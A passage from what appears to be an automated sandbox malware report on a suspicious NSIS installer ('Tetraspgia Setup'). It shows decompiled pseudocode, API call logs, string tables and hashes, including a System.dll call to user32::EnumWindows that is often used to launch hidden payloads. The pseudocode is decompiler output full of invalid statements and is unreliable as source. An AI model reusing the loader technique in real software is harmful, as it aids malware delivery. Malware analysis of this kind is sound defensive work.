				 *0x435adc = 0x10000;
				 *0x435ac0 =  *0x435a0c & 0x00000020;
				if(E00406638(_t97, _t94) != 0) {
					L16:
					if(E00406638(_t106, _t94) == 0) {
						_push( *((intOrPtr*)(_t87 + 0x118)));
						_push(_t94);
						E00405EBA();
					}
					_t31 = LoadImageW( *0x4349f4, 0x67, "true", 0, 0, 0x8040); // executed
					_t82 = _t31;
					 *0x4349d8 = _t82;
					if( *((intOrPtr*)(_t87 + 0x50)) == 0xffffffff) {
						L22:
						__eflags = E00401533(0);
						if(__eflags != 0) {
							L32:
							_t33 = 2;
							return _t33;
						}
						_t34 = E0040597F(__eflags);
						__eflags =  *0x435ae0;
						if( *0x435ae0 != 0) {
							_t35 = E00405864(_t34, 0);
							__eflags = _t35;
							if(_t35 == 0) {
								E00401533("true");
								goto L20;
							}
							__eflags =  *0x4349ec;
							if( *0x4349ec == 0) {
								E00401533(2);
							}
							goto L32;
						}
						ShowWindow( *0x42dd50, 5); // executed
						_t40 = E0040619E("RichEd20"); // executed
						__eflags = _t40;
						if(_t40 == 0) {
							E0040619E("RichEd32");
						}
						_t41 = GetClassInfoW(0, L"RichEdit20W", 0x4349a0);
						__eflags = _t41;
						if(_t41 == 0) {
							GetClassInfoW(0, L"RichEdit", 0x4349a0);
							 *0x4349c4 = L"RichEdit20W";
							RegisterClassW(0x4349a0);
						}
						_t45 = DialogBoxParamW( *0x4349f4,  *0x4349d4 + 0x00000069 & 0x0000ffff, 0, E00404F92, 0); // executed
						E00403CF8(E00401533(5), "true");
						return _t45;
					} else {
						_t92 = L"_Nb";
						 *0x4349a4 = E00401000;
						 *0x4349b0 =  *0x4349f4;
						 *0x4349b4 = _t82;
						 *0x4349c4 = _t92;
						if(RegisterClassW(0x4349a0) != 0) {
							SystemParametersInfoW("true", 0,  &_v16, 0);
							_t59 = _v8 - _v16;
							__eflags = _t59;
							 *0x42dd50 = CreateWindowExW("true", _t92, 0, "true", _v16, _v12, _t59, _v4 - _v12, 0, 0,  *0x4349f4, 0);
							goto L22;
						}
						L20:
						return 0;
					}
				} else {
					_t86 =  *(_t87 + 0x48);
					_t99 = _t86;
					if(_t86 == 0) {
						goto L16;
					}
					_t83 =  *0x435a38;
					_t93 = 0x4339a0;
					E00406977( *0x435a38, _t99,  *((intOrPtr*)(_t87 + 0x44)),  *0x435a38 + _t86 * 2, _t83 +  *(_t87 + 0x4c) * 2, 0x4339a0, 0);
					_t66 =  *0x4339a0; // 0x43
					if(_t66 == 0) {
						goto L16;
					}
					_t84 = 0x22;
					if(_t66 == _t84) {
						_t93 = 0x4339a2;
						 *((short*)(E004065F6(0x4339a2, _t84))) = 0;
					}
					_t69 =  &(_t93[lstrlenW(_t93) + 0xfffffffc]);
					if(_t69 <= _t93 || lstrcmpiW(_t69, L".exe") != 0) {
						L15:
						E00406B1A(_t94, E00406556(_t93));
						goto L16;
					} else {
						_t73 = GetFileAttributesW(_t93);
						if(_t73 == 0xffffffff) {
							L14:
							E00406D10(_t93);
							goto L15;
						}
						_t106 = _t73 & 0x00000010;
						if((_t73 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00405a45
0x00405a4d
0x00405a52
0x00405a56
0x00405a57
0x00405a59
0x00405a6d
0x00405a6f
0x00405a76
0x00405a85
0x00405a91
0x00405a97
0x00405a9c
0x00405aa3
0x00405ab6
0x00405ab6
0x00405ac1
0x00405a5b
0x00405a5b
0x00405a66
0x00405a66
0x00405ac6
0x00405ad0
0x00405ad8
0x00405ae3
0x00405aef
0x00405b87
0x00405b8f
0x00405b91
0x00405b97
0x00405b98
0x00405b98
0x00405bae
0x00405bb4
0x00405bbb
0x00405bcb
0x00405c4a
0x00405c50
0x00405c52
0x00405d04
0x00405d06
0x00000000
0x00405d06
0x00405c58
0x00405c5d
0x00405c63
0x00405cec
0x00405cf1
0x00405cf3
0x00405d11
0x00000000
0x00405d11
0x00405cf5
0x00405cfb
0x00405cff
0x00405cff
0x00000000
0x00405cfb
0x00405c71
0x00405c7c
0x00405c81
0x00405c83
0x00405c8a
0x00405c8a
0x00405c9c
0x00405c9e
0x00405ca0
0x00405ca9
0x00405cac
0x00405cb6
0x00405cb6
0x00405cd1
0x00405ce2
0x00000000
0x00405bcd
0x00405bd2
0x00405bd8
0x00405be2
0x00405be7
0x00405bed
0x00405bf8
0x00405c0a
0x00405c26
0x00405c26
0x00405c45
0x00000000
0x00405c45
0x00405bfa
0x00000000
0x00405bfa
0x00405af5
0x00405af5
0x00405af8
0x00405afa
0x00000000
0x00000000
0x00405b00
0x00405b06
0x00405b1b
0x00405b20
0x00405b29
0x00000000
0x00000000
0x00405b2d
0x00405b31
0x00405b34
0x00405b41
0x00405b41
0x00405b4d
0x00405b52
0x00405b7a
0x00405b82
0x00000000
0x00405b64
0x00405b65
0x00405b6e
0x00405b74
0x00405b75
0x00000000
0x00405b75
0x00405b70
0x00405b72
0x00000000
0x00000000
0x00000000
0x00405b72
0x00405b52

APIs

Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910

GetUserDefaultUILanguage.KERNELBASE(00000002,00000000,76A83420,00000000,76A83170), ref: 00405A5B

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

lstrcatW.KERNEL32(1033,Tetraspgia Setup: Installing), ref: 00405AC1
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Tetraspgia Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tetraspgia Setup: Installing,00000000,00000002,00000000), ref: 00405B45
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Tetraspgia Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tetraspgia Setup: Installing,00000000), ref: 00405B5A
GetFileAttributesW.KERNEL32(Call), ref: 00405B65
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\mnstring), ref: 00405BAE
RegisterClassW.USER32(004349A0), ref: 00405BF3
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00405C0A
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C3F
ShowWindow.USER32(00000005,00000000), ref: 00405C71
GetClassInfoW.USER32(00000000,RichEdit20W,004349A0), ref: 00405C9C
GetClassInfoW.USER32(00000000,RichEdit,004349A0), ref: 00405CA9
RegisterClassW.USER32(004349A0), ref: 00405CB6
DialogBoxParamW.USER32(?,00000000,00404F92,00000000), ref: 00405CD1

Strings

.DEFAULT\Control Panel\International, xrefs: 00405AAC
RichEdit, xrefs: 00405CA3
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 00405AD0, 00405AE2, 00405B81, 00405B87, 00405B97
_Nb, xrefs: 00405BD2, 00405C39
1033, xrefs: 00405A61, 00405A85, 00405ABC
Tetraspgia Setup: Installing, xrefs: 00405A71, 00405A7C, 00405A9C, 00405AA6, 00405ABB
RichEd20, xrefs: 00405C77
RichEd32, xrefs: 00405C85
Call, xrefs: 00405B06, 00405B0F, 00405B20, 00405B74, 00405B7A
.exe, xrefs: 00405B54
Control Panel\Desktop\ResourceLocale, xrefs: 00405A7E
RichEdit20W, xrefs: 00405C96, 00405CAC

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\mnstring$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Tetraspgia Setup: Installing$_Nb
API String ID: 606308-2705977144
Opcode ID: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
Instruction ID: 6fb6b78dff8dcbba7a007941f02a836e4a1cfbcf653c0408c2f56a309db5e394
Opcode Fuzzy Hash: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
Instruction Fuzzy Hash: 7061E4B1201605BEE610AB75AD45F7B36ACEF80358F50453BF901B61E2DB79AC108F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040154A Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040154A() {
				signed int _t456;
				intOrPtr _t460;
				signed int _t462;
				signed int _t464;
				int* _t466;
				signed int _t469;
				void* _t482;
				void* _t483;

				_t462 = 7;
				 *((intOrPtr*)(_t482 + 0x20)) =  *0x4349f8;
				memcpy(_t482 + 0x24,  *(_t482 + 0x2dc), _t462 << 2);
				_t483 = _t482 + 0xc;
				_t464 =  *(_t483 + 0x28);
				_t466 = L"user32::EnumWindows(i r1 ,i 0)";
				_t456 =  *(_t483 + 0x2c);
				 *(_t483 + 0x50) = _t464;
				 *((intOrPtr*)(_t483 + 0x1c)) = (_t464 << 0xb) + _t466;
				 *0x40b104 = _t483 + 0x28;
				_t469 =  *((intOrPtr*)(_t483 + 0x24)) + 0xfffffffe;
				 *((intOrPtr*)(_t483 + 0x10)) = 0;
				 *(_t483 + 0x18) = _t469;
				 *(_t483 + 0x40) = _t456;
				 *((intOrPtr*)(_t483 + 0x14)) = (_t456 << 0xb) + _t466;
				if(_t469 > 0x43) {
					L403:
					_t460 =  *((intOrPtr*)(_t483 + 0x10));
					L404:
					 *0x435ac8 =  *0x435ac8 + _t460;
					L405:
					return 0;
				}
				switch( *((intOrPtr*)( *(_t483 + 0x18) * 4 +  &M00402EBA))) {
					case 0:
						return _t464;
					case 1:
						_push(0);
						_push(__ecx);
						goto L4;
					case 2:
						 *0x4349ec =  *0x4349ec + 1;
						__eflags = __edx;
						if(__edx != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						E004030FD(__ecx) = __eax - 1;
						_push(0);
						return __eax;
					case 4:
						_push(0);
						_push(__ecx);
						goto L10;
					case 5:
						__eax = E00403002(0);
						0 = 1;
						__eflags = __eax - 1;
						__ecx =  >  ? __eax : 1;
						Sleep( >  ? __eax : 1);
						goto L403;
					case 6:
						__eax = SetForegroundWindow(__edx);
						goto L403;
					case 7:
						__edx =  *0x4349e4;
						__esi = ShowWindow;
						__eflags = __edx;
						if(__edx != 0) {
							__eax = ShowWindow(__edx, __eax); // executed
							__ecx =  *(__esp + 0x28);
						}
						__eax =  *0x4349e8;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx); // executed
						}
						goto L403;
					case 8:
						__eax = E0040303E(__edx, "true");
						__eax = SetFileAttributesW(__eax,  *(__esp + 0x2c));
						goto L27;
					case 9:
						__edi = E0040303E(__edx, "true");
						__eax = E00406BC5(__edi);
						__ebx =  *(__esp + 0x10);
						__esi = __eax;
						__eflags = __esi;
						if(__esi == 0) {
							L41:
							__eflags =  *(__esp + 0x2c);
							_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							if(__eflags == 0) {
								_push(0xfffffff5);
								goto L10;
							} else {
								_push(0xffffffe6);
								E00405D3A() = E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", __edi);
								__eax = SetCurrentDirectoryW(__edi); // executed
								__eflags = __eax;
								if(__eax == 0) {
									 *(__esp + 0x10) = 0;
								}
								goto L403;
							}
						} else {
							goto L30;
						}
						L31:
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							goto L34;
						}
						__eax = E004064FC();
						__eflags = __eax;
						if(__eax != 0) {
							__eax = E00405E3E(__edi); // executed
							L35:
							__eflags = __eax;
							if(__eax == 0) {
								L39:
								 *__esi = __bp;
								__esi = __esi + 2;
								__eflags = __bp;
								if(__bp != 0) {
									L30:
									__esi = E004065F6(__esi, "true");
									__eax = 0;
									__ebp =  *__esi & 0x0000ffff;
									 *__esi = __ax;
									__eflags = __bp;
									if(__bp != 0) {
										goto L34;
									}
									goto L31;
								} else {
									 *(__esp + 0x10) = __ebx;
									goto L41;
								}
							}
							__eflags = __eax - 0xb7;
							if(__eax != 0xb7) {
								L38:
								__ebx =  &(__ebx[0]);
								__eflags = __ebx;
								goto L39;
							}
							__eax = GetFileAttributesW(__edi); // executed
							__eflags = __al & 0x00000010;
							if((__al & 0x00000010) != 0) {
								goto L39;
							}
							goto L38;
						}
						L34:
						__eax = E00405E1E(__edi);
						goto L35;
					case 0xa:
						__eax = E0040303E(__edx, 0);
						__eax = E004065CF(__eax);
						goto L179;
					case 0xb:
						__eax =  *(__esp + 0x30);
						__eflags =  *(__esp + 0x30);
						if(__eflags > 0) {
							__eax =  *(0x435a80 + __ecx * 4);
							 *(0x435ac0 + __ecx * 4) =  *(0x435a80 + __ecx * 4);
						} else {
							if(__eflags == 0) {
								__eax =  *(0x435ac0 + __ecx * 4);
								 *(0x435a80 + __ecx * 4) =  *(0x435ac0 + __ecx * 4);
							}
							0 = E00403002("true");
							__eax =  *(__esp + 0x28);
							 *(0x435ac0 +  *(__esp + 0x28) * 4) = __ecx;
						}
						goto L403;
					case 0xc:
						__ecx =  *(__esp + 0x30);
						_push("true");
						__edx =  *(0x435ac0 + __ecx * 4);
						__edx = __edx &  *(__esp + 0x38);
						 *(0x435ac0 + __ecx * 4) = __edx &  *(__esp + 0x38);
						__eax = 0;
						__eflags = __edx;
						_pop(__ecx);
						 ==  ? 0 : 0 =  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
						return  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
					case 0xd:
						_push( *((intOrPtr*)(0x435ac0 + __eax * 4)));
						goto L20;
					case 0xe:
						__esi = E0040303E(__edx, "true");
						__edi = E0040303E(__edx, 0xffffffdf);
						__eax = E0040303E(__edx, 0x13);
						__eax = MoveFileW(__esi, __edi);
						__eflags = __eax;
						if(__eax == 0) {
							__eflags =  *(__esp + 0x30);
							if( *(__esp + 0x30) == 0) {
								goto L28;
							}
							__eax = E004065CF(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L28;
							}
							__eax = E0040623D(__esi, __edi);
							_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							_push("true");
							L10:
							__eax = E00405D3A();
							goto L403;
						}
						_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
						_push(0xffffffe3);
						goto L10;
					case 0xf:
						__edi = E0040303E(__edx, 0);
						__eax = __esp + 0x14;
						__eax = GetFullPathNameW(__edi, 0x400, __esi, __esp + 0x14);
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *(__esp + 0x14);
							__eflags = __eax - __edi;
							if(__eax <= __edi) {
								L57:
								__ebx =  *(__esp + 0x10);
								L58:
								__eflags =  *(__esp + 0x30) - __ebp;
								if( *(__esp + 0x30) == __ebp) {
									__eax = GetShortPathNameW(__esi, __esi, 0x400);
								}
								goto L404;
							}
							__eflags =  *__eax - __bp;
							if( *__eax == __bp) {
								goto L57;
							}
							__eax = E004065CF(__edi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L52;
							}
							__eflags = __eax;
							__eax = E00406B1A( *(__esp + 0x18), __eax);
							goto L57;
						}
						L52:
						0 = 1;
						__eax = 0;
						 *__esi = __ax;
						goto L58;
					case 0x10:
						__eax = E0040303E(__edx, 0xffffffff);
						__ecx = __esp + 0x50;
						__eax = SearchPathW(0, __eax, 0, 0x400, __edi, __esp + 0x50);
						__eflags = __eax;
						if(__eax != 0) {
							goto L403;
						}
						goto L61;
					case 0x11:
						__eax = E0040303E(__edx, 0xffffffef);
						__eax = E00406A56(__ecx, __edi, __eax); // executed
						goto L27;
					case 0x12:
						__eax = E0040303E(__edx, 0x31);
						__ebx =  *(__esp + 0x28);
						__esi = __eax;
						__ebx =  *(__esp + 0x28) & 0x00000007;
						 *(__esp + 0x1c) = __esi;
						 *(__esp + 0x18) = __ebx;
						__eax = E00406E03(__esi);
						__edi = L"Call";
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00406B1A(__edi, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring");
							__eax = lstrcatW(__eax, ??);
						} else {
							_push(__edi);
							__eax = E00406B1A();
						}
						__eax = E00406D3D(__edi);
						__esi = 0;
						__esi = 1;
						__eflags = 1;
						while(1) {
							__eflags = __ebx - 3;
							if(__ebx >= 3) {
								__eax = E004065CF(__edi);
								__ecx = __ebp;
								__eflags = __eax;
								if(__eax != 0) {
									__ecx = __esp + 0x34;
									__eax =  &(__eax[0xa]);
									__eflags = __eax;
									0 = __eax;
								}
								__ebx =  &(__ebx[0xffffffffffffffff]);
								__ebx = __ebx | 0x80000000;
								__ebx = __ebx & __ecx;
								__ebx =  ~__ebx;
								asm("sbb ebx, ebx");
								__ebx =  &(__ebx[0]);
								__eflags = __ebx;
								 *(__esp + 0x14) = __ebx;
							}
							__eflags = __ebx;
							if(__ebx == 0) {
								__eax = E00406B9D(__edi);
							}
							__eax = 0;
							__eflags = __ebx - __esi;
							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
							__eax = E0040691B(__edi, "true", (__eflags != 0) + 1);
							 *(__esp + 0x18) = __eax;
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								break;
							}
							__eflags = __ebx;
							if(__ebx != 0) {
								__esi =  *(__esp + 0x1c);
								__eax = E00405D3A(0xffffffe2,  *(__esp + 0x1c));
								__ebx = 0;
								__eflags =  *(__esp + 0x14) - 2;
								goto L80;
							}
							E00406B1A("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp", L"user32::EnumWindows(i r1 ,i 0)") = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", __edi);
							_push( *(__esp + 0x3c));
							_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							E00405EBA() = E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp");
							 *(__esp + 0x28) =  *(__esp + 0x28) >> 3;
							__eax = E00406AA8("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll",  *(__esp + 0x28) >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
							if(__eax == 0) {
								continue;
							}
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax == 0) {
								 *0x435ac8 =  *0x435ac8 + 1;
								goto L405;
							}
							_push(__edi);
							_push(0xfffffffa);
							L4:
							__eax = E00405D3A();
							goto L5;
						}
						__esi =  *(__esp + 0x1c);
						__eax = E00405D3A(0xffffffea, __esi);
						__ebx =  *(__esp + 0x18);
						 *0x435af4 =  *0x435af4 + 1;
						__eax = E00403148( *(__esp + 0x3c), __ebx, __ebp, __ebp);
						 *0x435af4 =  *0x435af4 - 1;
						__eflags =  *(__esp + 0x34) - 0xffffffff;
						 *(__esp + 0x18) = __eax;
						if( *(__esp + 0x34) != 0xffffffff) {
							L83:
							__esp + 0x34 = SetFileTime(0, __esp + 0x34, __ebp, __esp + 0x34); // executed
							L84:
							__eax = CloseHandle(__ebx); // executed
							__eax =  *(__esp + 0x18);
							__eflags = __eax;
							if(__eax >= 0) {
								goto L403;
							}
							__eflags = __eax - 0xfffffffe;
							if(__eax != 0xfffffffe) {
								_push(0xffffffee);
								_push(__edi);
								__eax = E00405EBA();
							} else {
								_push(0xffffffe9);
								_push(__edi);
								E00405EBA() = lstrcatW(__edi, __esi);
							}
							_push(0x200010);
							_push(__edi);
							goto L89;
						}
						__eflags =  *(__esp + 0x38) - 0xffffffff;
						if( *(__esp + 0x38) == 0xffffffff) {
							goto L84;
						}
						goto L83;
					case 0x13:
						_push(0);
						goto L91;
					case 0x14:
						__eax = E0040303E(__edx, 0x31);
						__eax = E00406AA8(__eax,  *(__esp + 0x28));
						__eflags = __eax;
						if(__eax == 0) {
							goto L28;
						}
						__eflags = __eax -  *(__esp + 0x30);
						if(__eax ==  *(__esp + 0x30)) {
							goto L124;
						}
						__eflags = __eax -  *(__esp + 0x38);
						if(__eax !=  *(__esp + 0x38)) {
							goto L403;
						}
						__eax =  *(__esp + 0x3c);
						return  *(__esp + 0x3c);
					case 0x15:
						_push("true");
						L91:
						E0040303E(__edx) = E00406719(__eflags, __eax,  *(__esp + 0x2c));
						goto L403;
					case 0x16:
						__eax = E0040303E(__edx, "true");
						__eax = lstrlenW(__eax);
						goto L98;
					case 0x17:
						0 = E00403002(2);
						__esi = __edx;
						__ebp = E00403002(3);
						__eax = E0040303E(__edx, "true");
						 *(__esp + 0x1c) = __eax;
						__eax = lstrlenW(__eax);
						__ecx = 0;
						__eflags = __esi;
						 *__edi = __cx;
						__ebx =  ==  ? __eax : __ebx;
						__eflags = __ebx;
						if(__ebx == 0) {
							goto L403;
						}
						__eflags = __ebp;
						if(__ebp >= 0) {
							L102:
							__eflags = __ebp - __eax;
							__ebp =  >  ? __eax : __ebp;
							 *(__esp + 0x18) =  *(__esp + 0x18) + __ebp * 2;
							__eax = E00406B1A(__edi,  *(__esp + 0x18) + __ebp * 2);
							__eflags = __ebx;
							if(__ebx < 0) {
								0 = 0 + lstrlenW(__edi);
								__eflags = __ebx;
							}
							__eax = 0;
							__eflags = __ebx;
							__eax =  >=  ? __ebx : 0;
							__ebx =  *(__esp + 0x10);
							__eflags = __eax - 0x400;
							if(__eax < 0x400) {
								__ecx = 0;
								 *(__edi + __eax * 2) = __cx;
							}
							goto L404;
						}
						__ebp = __eax + __ebp;
						__eflags = __ebp;
						if(__ebp < 0) {
							goto L403;
						}
						goto L102;
					case 0x18:
						__esi = E0040303E(__edx, 0x20);
						_push(E0040303E(__edx, 0x31));
						_push(__esi);
						__eflags =  *(__esp + 0x40);
						if( *(__esp + 0x40) != 0) {
							__eax = lstrcmpW();
						} else {
							__eax = lstrcmpiW();
						}
						__eflags = __eax;
						if(__eax != 0) {
							L124:
							__eax =  *(__esp + 0x34);
							__al = __al & 0x00000034;
							return __eax;
						} else {
							goto L110;
						}
					case 0x19:
						__esi = 0;
						__esi = 1;
						0 = E0040303E(__edx, 1);
						__eax = ExpandEnvironmentStringsW(__ebx, __edi, 0x400);
						__eflags = __eax;
						if(__eax == 0) {
							L114:
							__eax = 0;
							__ebx = __esi;
							 *__edi = __ax;
							L116:
							__eax = 0;
							__eflags = 0;
							 *(__edi + 0x7fe) = __ax;
							__eflags = __cl;
							__eax =  *0x8b000012;
							goto L404;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							L115:
							__ebx =  *(__esp + 0x10);
							goto L116;
						}
						__eax = lstrcmpW(__ebx, __edi);
						__eflags = __eax;
						if(__eax != 0) {
							goto L115;
						}
						goto L114;
					case 0x1a:
						__esi =  *(__esp + 0x3c);
					case 0x1b:
						__ebx = 0;
						__ebx = 1;
						__esi = E00403002(1);
						0 = E00403002(2);
						__eax =  *(__esp + 0x34);
						__eflags = __eax - 0xd;
						if(__eax > 0xd) {
							L152:
							__ebx =  *(__esp + 0x10);
							L153:
							__eax = E0040661F(__edi, __esi);
							goto L404;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00402FCA))) {
							case 0:
								__esi = __esi + __ecx;
								goto L152;
							case 1:
								__esi = __esi - __ecx;
								goto L152;
							case 2:
								__esi = __esi * __ecx;
								goto L152;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L135;
								}
								__eax = __esi;
								asm("cdq");
								_t103 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t103;
								__esi = __eax;
								goto L136;
							case 4:
								__esi = __esi | __ecx;
								goto L152;
							case 5:
								__esi = __esi & __ecx;
								goto L152;
							case 6:
								__esi = __esi ^ __ecx;
								goto L152;
							case 7:
								__eax = 0;
								__eflags = __esi;
								__eax = 0 | __eflags == 0x00000000;
								__esi = __eflags == 0;
								goto L152;
							case 8:
								__eflags = __esi;
								if(__esi == 0) {
									goto L145;
								}
								goto L142;
							case 9:
								__eflags = __esi;
								if(__esi == 0) {
									L143:
									__esi = __ebp;
									goto L152;
								}
								L145:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L143;
								}
								L142:
								__esi = __ebx;
								goto L152;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L135:
									__esi = __ebp;
									L136:
									__ebx = 0;
									__eflags = __ecx;
									__ebx = 0 | __ecx == 0x00000000;
									goto L153;
								}
								__eax = __esi;
								asm("cdq");
								_t111 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t111;
								__esi = _t111;
								goto L136;
							case 0xb:
								__esi = __esi << __cl;
								goto L152;
							case 0xc:
								__esi = __esi >> __cl;
								goto L152;
							case 0xd:
								__eflags = __esi;
								goto L152;
						}
					case 0x1c:
						__esi = E0040303E(__edx, "true");
						E00403002(2) = wsprintfW(__edi, __esi, __eax);
						__esp = __esp + 0x10;
						goto L403;
					case 0x1d:
						__ecx =  *(__esp + 0x30);
						__esi =  *0x40b100; // 0x0
						__eflags = __ecx;
						if(__ecx == 0) {
							__eflags = __eax;
							if(__eax == 0) {
								__eax = GlobalAlloc("true", 0x804); // executed
								_push( *(__esp + 0x28));
								__esi = __eax;
								__eax = __esi + 4;
								_push(__esi + 4);
								__eax = E00405EBA();
								__eax =  *0x40b100; // 0x0
								 *__esi = __eax;
								 *0x40b100 = __esi;
								goto L403;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L28;
							}
							__esi + 4 = E00406B1A(__edi, __esi + 4);
							__eax =  *__esi;
							 *0x40b100 =  *__esi;
							__eax = GlobalFree(__esi);
							goto L403;
						} else {
							goto L156;
						}
						while(1) {
							L156:
							__ecx = __ecx - 1;
							__eflags = __esi;
							if(__esi == 0) {
								goto L161;
							}
							__esi =  *__esi;
							__eflags = __ecx;
							if(__ecx != 0) {
								continue;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L161;
							}
							__esi = __esi + 4;
							__edi = L"Call";
							__eax = E00406B1A(__edi, __esi);
							__eax =  *0x40b100; // 0x0
							__eax = E00406B1A(__esi, __eax);
							__eax =  *0x40b100; // 0x0
							_push(__edi);
							__eax =  &(__eax[2]);
							__eflags = __eax;
							_push(__eax);
							goto L160;
						}
						goto L161;
					case 0x1e:
						__esi = E00403002(3);
						 *(__esp + 0x1c) = __esi;
						0 = E00403002("true");
						__eax =  *(__esp + 0x44);
						__eflags = __al & 0x00000001;
						if((__al & 0x00000001) != 0) {
							__esi = E0040303E(__edx, 0x33);
							__eax =  *(__esp + 0x3c);
							 *(__esp + 0x14) = __esi;
						}
						__eflags = __al & 0x00000002;
						if((__al & 0x00000002) != 0) {
							0 = E0040303E(__edx, "true");
						}
						__eflags =  *(__esp + 0x24) - 0x21;
						_push("true");
						if(__eflags != 0) {
							__esi = E0040303E(__edx);
							__eax = E0040303E(__edx);
							__ecx = 0;
							__eflags =  *__eax - __bp;
							 !=  ? __eax : 0 = 0;
							__eflags =  *__esi - __bp;
							__ecx =  !=  ? __esi : 0;
							__eax = FindWindowExW( *(__esp + 0x20), __ebx,  !=  ? __esi : 0,  !=  ? __eax : 0);
							goto L175;
						} else {
							 *(__esp + 0x1c) = E00403002();
							__eax = E00403002(2);
							__ecx =  *(__esp + 0x3c);
							__ecx =  *(__esp + 0x3c) >> 2;
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = SendMessageW( *(__esp + 0x20), __eax, __esi, __ebx);
								L175:
								 *(__esp + 0x1c) = __eax;
								L176:
								__eflags =  *(__esp + 0x28) - __ebp;
								if( *(__esp + 0x28) < __ebp) {
									goto L403;
								}
								goto L98;
							}
							__edx = __esp + 0x1c;
							__eax =  ~__eax;
							asm("sbb ebx, ebx");
							__eax =  *(__esp + 0x1c);
							 *(__esp + 0x10) = 0;
							goto L176;
						}
					case 0x1f:
						__eax = E00403002(0);
						__eax = IsWindow(__eax);
						L179:
						__eflags = __eax;
						if(__eax == 0) {
							L110:
							__eax =  *(__esp + 0x30);
							return  *(__esp + 0x30);
						}
						__eax =  *(__esp + 0x2c);
						return  *(__esp + 0x2c);
					case 0x20:
						__esi = E00403002(2);
